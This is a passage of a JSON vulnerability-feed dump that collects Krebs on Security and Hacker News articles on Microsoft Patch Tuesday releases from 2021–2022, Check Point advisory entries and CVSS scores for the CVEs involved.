Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=1&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=PortalProduct>), [SUSE](<https://www.suse.com/support/update/>), and [Ubuntu](<https://ubuntu.com/security/notices>)\n * [MediaTek](<https://corp.mediatek.com/product-security-bulletin/July-2022>)\n * [Qualcomm](<https://docs.qualcomm.com/product/publicresources/securitybulletin/july-2022-bulletin.html>)\n * [SAP](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>), and\n * [VMware](<https://www.vmware.com/security/advisories.html>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-13T04:15:00", "type": "thn", "title": "Microsoft Releases Fix for Zero-Day Flaw in July 2022 Security Patch Rollout", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-22022", "CVE-2022-22025", "CVE-2022-22026", "CVE-2022-22029", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22040", "CVE-2022-22041", "CVE-2022-22047", "CVE-2022-22049", "CVE-2022-30206", "CVE-2022-30208", "CVE-2022-30216", "CVE-2022-30221", "CVE-2022-30222", "CVE-2022-30226", "CVE-2022-33637"], "modified": "2022-07-13T05:36:49", "id": "THN:8C2FBC83F6EC62900F1887F00903447F", "href": "https://thehackernews.com/2022/07/microsoft-releases-fix-for-zero-day.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "krebs": [{"lastseen": "2021-06-15T08:32:06", "description": "**Microsoft** today released another round of security updates for **Windows** operating systems and supported software, _including fixes for six zero-day bugs that malicious hackers already are exploiting in active attacks._\n\n\n\nJune&#x27;s Patch Tuesday addresses just 49 security holes -- about half the normal number of vulnerabilities lately. But what this month lacks in volume it makes up for in urgency: Microsoft warns that bad guys are leveraging a half-dozen of those weaknesses to break into computers in targeted attacks.\n\nAmong the zero-days are:\n\n-[CVE-2021-33742](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33742>), a remote code execution bug in a Windows HTML component. \n-[CVE-2021-31955](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31955>), an information disclosure bug in the Windows Kernel \n-[CVE-2021-31956](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31956>), an elevation of privilege flaw in Windows NTFS \n-[CVE-2021-33739](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33739>), an elevation of privilege flaw in the Microsoft Desktop Window Manager \n-[CVE-2021-31201](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31201>), an elevation of privilege flaw in the Microsoft Enhanced Cryptographic Provider \n-[CVE-2021-31199](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31199>), an elevation of privilege flaw in the Microsoft Enhanced Cryptographic Provider\n\n**Kevin Breen**, director of cyber threat research at **Immersive Labs**, said elevation of privilege flaws are just as valuable to attackers as remote code execution bugs: Once the attacker has gained an initial foothold, he can move laterally across the network and uncover further ways to escalate to system or domain-level access.\n\n&quot;This can be hugely damaging in the event of ransomware attacks, where high privileges can enable the attackers to stop or destroy backups and other security tools,&quot; Breen said. &quot;The &#x27;exploit detected&#x27; tag means attackers are actively using them, so for me, it\u2019s the most important piece of information we need to prioritize the patches.&quot;\n\nMicrosoft also patched five critical bugs -- flaws that can be remotely exploited to seize control over the targeted Windows computer without any help from users. [CVE-2021-31959](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31959>) affects everything from **Windows 7** through **Windows 10** and **Server** versions **2008**,** 2012**, **2016** and **2019**.\n\n**Sharepoint** also got a critical update in [CVE-2021-31963](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31963>); Microsoft says this one is less likely to be exploited, but then critical Sharepoint flaws are a favorite target of ransomware criminals.\n\nInterestingly, two of the Windows zero-day flaws -- CVE-2021-31201 and CVE-2021-31199 -- are related to a patch **Adobe** released recently for [CVE-2021-28550](<https://helpx.adobe.com/security/products/acrobat/apsb21-29.html>), a flaw in **Adobe Acrobat** and **Reader** that also is being actively exploited.\n\n&quot;Attackers have been seen exploiting these vulnerabilities by sending victims specially crafted PDFs, often attached in a phishing email, that when opened on the victim&#x27;s machine, the attacker is able to gain arbitrary code execution,&quot; said** Christopher Hass**, director of information security and research at **Automox**. &quot;There are no workarounds for these vulnerabilities, patching as soon as possible is highly recommended.&quot;\n\nIn addition to updating Acrobat and Reader, Adobe patched flaws in a slew of other products today, including **Adobe Connect,** **Photoshop**, and **Creative Cloud**. The full list is [here](<https://helpx.adobe.com/security.html>), with links to updates.\n\nThe usual disclaimer:\n\nBefore you update with this month\u2019s patch batch, please make sure you have backed up your system and/or important files. It\u2019s not uncommon for Windows updates to hose one\u2019s system or prevent it from booting properly, and some updates even have been known to erase or corrupt files.\n\nSo do yourself a favor and backup _before_ installing any patches. Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAnd if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see [this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nAs always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.\n\nFor a quick visual breakdown of each update released today and its severity level, check out the [this Patch Tuesday post](<https://isc.sans.edu/forums/diary/Microsoft+June+2021+Patch+Tuesday/27506/>) from the **SANS Internet Storm Center**.", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-08T20:53:28", "type": "krebs", "title": "Microsoft Patches Six Zero-Day Security Holes", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31959", "CVE-2021-31963", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-06-08T20:53:28", "id": "KREBS:E374075CAB55D7AB06EBD73CB87D33CD", "href": "https://krebsonsecurity.com/2021/06/microsoft-patches-six-zero-day-security-holes/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-21T10:08:03", "description": "**Microsoft** today released software updates to plug at least 44 security vulnerabilities in its **Windows** operating systems and related products. The software giant warned that attackers already are pouncing on one of the flaws, which ironically enough involves an easy-to-exploit bug in the software component responsible for patching **Windows 10** PCs and **Windows Server 2019** machines.\n\n\n\nMicrosoft said attackers have seized upon [CVE-2021-36948](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36948>), which is a weakness in the **Windows Update Medic** service. Update Medic is a new service that lets users repair Windows Update components from a damaged state so that the device can continue to receive updates.\n\nRedmond says while CVE-2021-36948 is being actively exploited, it is not aware of exploit code publicly available. The flaw is an &quot;elevation of privilege&quot; vulnerability that affects Windows 10 and **Windows Server 2019**, meaning it can be leveraged in combination with another vulnerability to let attackers run code of their choice as administrator on a vulnerable system.\n\n&quot;CVE-2021-36948 is a privilege escalation vulnerability - the cornerstone of modern intrusions as they allow attackers the level of access to do things like hide their tracks and create user accounts,&quot; said **Kevin Breen** of [Immersive Labs](<https://www.immersivelabs.com>). &quot;In the case of ransomware attacks, they have also been used to ensure maximum damage.&quot;\n\nAccording to Microsoft, critical flaws are those that can be exploited remotely by malware or malcontents to take complete control over a vulnerable Windows computer -- and with little to no help from users. Top of the heap again this month: Microsoft also took another stab at fixing a broad class of weaknesses in its printing software.\n\nLast month, the company rushed out an emergency update to patch &quot;[PrintNightmare](<https://krebsonsecurity.com/2021/07/microsoft-issues-emergency-patch-for-windows-flaw/>)&quot; -- a critical hole in its Windows Print Spooler software that was being attacked in the wild. Since then, a number of researchers have discovered holes in that patch, allowing them to circumvent its protections.\n\nToday&#x27;s Patch Tuesday fixes another critical Print Spooler flaw ([CVE-2021-36936](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36936>)), but it&#x27;s not clear if this bug is a variant of PrintNightmare or a unique vulnerability all on its own, said **Dustin Childs** at **Trend Micro&#x27;s Zero Day Initiative**.\n\n&quot;Microsoft does state low privileges are required, so that should put this in the non-wormable category, but you should still prioritize testing and deployment of this Critical-rated bug,&quot; Childs said.\n\nMicrosoft said the Print Spooler patch it is pushing today should address all publicly documented security problems with the service.\n\n&quot;Today we are addressing this risk by changing the default Point and Print driver installation and update behavior to require administrator privileges,&quot; Microsoft said in a blog post. &quot;This change may impact Windows print clients in scenarios where non-elevated users were previously able to add or update printers. However, we strongly believe that the security risk justifies the change. This change will take effect with the installation of the security updates released on August 10, 2021 for all versions of Windows, and is documented as [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34481>).&quot;\n\nAugust brings yet another critical patch ([CVE-2021-34535](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34535>)) for the **Windows Remote Desktop** service, and this time the flaw is in the Remote Desktop client instead of the server.\n\n[CVE-2021-26424](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26424>) -- a scary, critical bug in the **Windows TCP/IP** component -- earned a CVSS score of 9.9 (10 is the worst), and is present in **Windows 7** through **Windows 10**, and Windows Server 2008 through 2019 (Windows 7 is no longer being supported with security updates).\n\nMicrosoft said it was not aware of anyone exploiting this bug yet, although the company assigned it the label &quot;exploitation more likely,&quot; meaning it may not be difficult for attackers to figure out. CVE-2021-26424 could be exploited by sending a single malicious data packet to a vulnerable system.\n\nFor a complete rundown of all patches released today and indexed by severity, check out the [always-useful Patch Tuesday roundup](<https://isc.sans.edu/forums/diary/Microsoft+August+2021+Patch+Tuesday/27736/>) from the **SANS Internet Storm Center**. And it&#x27;s not a bad idea to hold off updating for a few days until Microsoft works out any kinks in the updates: [AskWoody.com](<https://www.askwoody.com/2021/defcon-2-august-updates-include-print-spooler-fixes/>) usually has the lowdown on any patches that are causing problems for Windows users.\n\nOn that note, before you update _please_ make sure you have backed up your system and/or important files. It\u2019s not uncommon for a Windows update package to hose one\u2019s system or prevent it from booting properly, and some updates have been known to erase or corrupt files.\n\nSo do yourself a favor and backup before installing any patches. Windows 10 even has some [built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAnd if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, [see this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nIf you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a decent chance other readers have experienced the same and may chime in here with useful tips.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-10T21:12:58", "type": "krebs", "title": "Microsoft Patch Tuesday, August 2021 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26424", "CVE-2021-34481", "CVE-2021-34535", "CVE-2021-36936", "CVE-2021-36948"], "modified": "2021-08-10T21:12:58", "id": "KREBS:AE87E964E683A56CFE4E51E96F3530AD", "href": "https://krebsonsecurity.com/2021/08/microsoft-patch-tuesday-august-2021-edition/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-16T21:59:04", "description": "**Microsoft** today released updates to fix at least 86 security vulnerabilities in its **Windows** operating systems and other software, including a weakness in all supported versions of Windows that Microsoft warns is actively being exploited. The software giant also has made a controversial decision to put the brakes on a plan to block **macros** in **Office** documents downloaded from the Internet.\n\n\n\nIn February, security experts hailed Microsoft&#x27;s decision to block VBA macros in all documents downloaded from the Internet. The company said it would roll out the changes in stages between April and June 2022.\n\nMacros have long been a trusted way for cybercrooks to trick people into running malicious code. Microsoft Office by default warns users that enabling macros in untrusted documents is a security risk, but those warnings can be easily disabled with the click of button. Under Microsoft&#x27;s plan, the new warnings provided no such way to enable the macros.\n\nAs _Ars Technica_ veteran reporter **Dan Goodin** [put it](<https://arstechnica.com/information-technology/2022/07/microsoft-makes-major-course-reversal-allows-office-to-run-untrusted-macros/>), &quot;security professionals\u2014some who have spent the past two decades watching clients and employees get infected with ransomware, wipers, and espionage with frustrating regularity\u2014cheered the change.&quot;\n\nBut last week, Microsoft abruptly changed course. As [first reported](<https://www.bleepingcomputer.com/news/microsoft/microsoft-rolls-back-decision-to-block-office-macros-by-default/>) by _BleepingComputer_, Redmond said it would roll back the changes based on feedback from users.\n\n&quot;While Microsoft has not shared the negative feedback that led to the rollback of this change, users have reported that they are unable to find the Unblock button to remove the Mark-of-the-Web from downloaded files, making it impossible to enable macros,&quot; Bleeping&#x27;s **Sergiu Gatlan** wrote.\n\nMicrosoft later said the decision to roll back turning off macros by default was temporary, although it has not indicated when this important change might be made for good.\n\nThe zero-day Windows vulnerability already seeing active attacks is [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>), which is an elevation of privilege vulnerability in all supported versions of Windows. Trend Micro&#x27;s **Zero Day Initiative** notes that while this bug is listed as being under active attack, there\u2019s no information from Microsoft on where or how widely it is being exploited.\n\n&quot;The vulnerability allows an attacker to execute code as SYSTEM, provided they can execute other code on the target,&quot; ZDI&#x27;s Dustin Childs [wrote](<https://www.zerodayinitiative.com/blog/2022/7/12/the-july-2022-security-update-review>). &quot;Bugs of this type are typically paired with a code execution bug, usually a specially crafted Office or Adobe document, to take over a system. These attacks often rely on macros, which is why so many were disheartened to hear Microsoft\u2019s delay in blocking all Office macros by default.&quot;\n\n**Kevin Breen**, director of cyber threat research at **Immersive Labs**, said CVE-2022-22047 is the kind of vulnerability that is typically seen abused after a target has already been compromised.\n\n&quot;Crucially, it allows the attacker to escalate their permissions from that of a normal user to the same permissions as the SYSTEM,&quot; he said. &quot;With this level of access, the attackers are able to disable local services such as Endpoint Detection and Security tools. With SYSTEM access they can also deploy tools like Mimikatz which can be used to recover even more admin and domain level accounts, spreading the threat quickly.&quot;\n\nAfter a brief reprieve from patching serious security problems in the **Windows Print Spooler** service, we are back to business as usual. July&#x27;s patch batch contains fixes for four separate elevation of privilege vulnerabilities in Windows Print Spooler, identified as [CVE-2022-22022](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22022>), [CVE-2022-22041](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22041>), [CVE-2022-30206](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30206>), and [CVE-2022-30226](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30226>). Experts at security firm **Tenable** note that these four flaws provide attackers with the ability to delete files or gain SYSTEM level privileges on a vulnerable system.\n\nRoughly a third of the patches issued today involve weaknesses in Microsoft&#x27;s Azure Site Recovery offering. Other components seeing updates this month include **Microsoft Defender for Endpoint**; **Microsoft Edge** (Chromium-based); **Office**; **Windows BitLocker**; **Windows Hyper-V**; **Skype for Business** and **Microsoft Lync**; and **Xbox**.\n\nFour of the flaws fixed this month address vulnerabilities Microsoft rates &quot;critical,&quot; meaning they could be used by malware or malcontents to assume remote control over unpatched Windows systems, usually without any help from users. [CVE-2022-22029](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22029>) and [CVE-2022-22039](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22039>) affect Network File System (NFS) servers, and [CVE-2022-22038](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22038>) affects the Remote Procedure Call (RPC) runtime.\n\n&quot;Although all three of these will be relatively tricky for attackers to exploit due to the amount of sustained data that needs to be transmitted, administrators should patch sooner rather than later,&quot; said **Greg Wiseman**, product manager at **Rapid7**. &quot;[CVE-2022-30221](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30221>) supposedly affects the Windows Graphics Component, though Microsoft\u2019s FAQ indicates that exploitation requires users to access a malicious RDP server.&quot;\n\nSeparately, Adobe today [issued patches](<https://helpx.adobe.com/security.html>) to address at least 27 vulnerabilities across multiple products, including **Acrobat** and **Reader**, **Photoshop**, **RoboHelp**, and **Adobe Character Animator**.\n\nFor a closer look at the patches released by Microsoft today and indexed by severity and other metrics, check out the [always-useful Patch Tuesday roundup](<https://isc.sans.edu/forums/diary/Microsoft%20July%202022%20Patch%20Tuesday/28838/>) from the **SANS Internet Storm Center**. And it\u2019s not a bad idea to hold off updating for a few days until Microsoft works out any kinks in the updates: [AskWoody.com](<https://www.askwoody.com/>) usually has the lowdown on any patches that may be causing problems for Windows users.\n\nAs always, please consider backing up your system or at least your important documents and data before applying system updates. And if you run into any problems with these updates, please drop a note about it here in the comments.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-13T01:02:49", "type": "krebs", "title": "Microsoft Patch Tuesday, July 2022 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22022", "CVE-2022-22029", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22041", "CVE-2022-22047", "CVE-2022-30206", "CVE-2022-30221", "CVE-2022-30226"], "modified": "2022-07-13T01:02:49", "id": "KREBS:4D5B2D5FA1A6E077B46D7F3051319E72", "href": "https://krebsonsecurity.com/2022/07/microsoft-patch-tuesday-july-2022-edition/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:34:43", "description": "A use-after-free vulnerability exists in Adobe Acrobat and Reader. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-11T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Acrobat and Reader Use After Free (APSB21-29: CVE-2021-28550)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550"], "modified": "2021-05-18T00:00:00", "id": "CPAI-2021-0278", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:38:06", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Update Medic Service Privilege Escalation (CVE-2021-36948)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36948"], "modified": "2021-08-12T00:00:00", "id": "CPAI-2021-0508", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:34:27", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows dssenh.dll Elevation of Privilege (CVE-2021-31201)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31201"], "modified": "2021-06-08T00:00:00", "id": "CPAI-2021-0314", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:34:25", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows rsaenh.dll Elevation of Privilege (CVE-2021-31199)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31199"], "modified": "2021-06-08T00:00:00", "id": "CPAI-2021-0317", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-16T17:58:18", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Client/Server Runtime Subsystem Elevation of Privilege (CVE-2022-22047)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22047"], "modified": "2022-07-12T00:00:00", "id": "CPAI-2022-0362", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "veracode": [{"lastseen": "2022-07-26T16:56:51", "description": "tor:edge is vulnerable to denial of service. The vl one of three use after free (UAF) bugs.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-22T23:04:19", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, 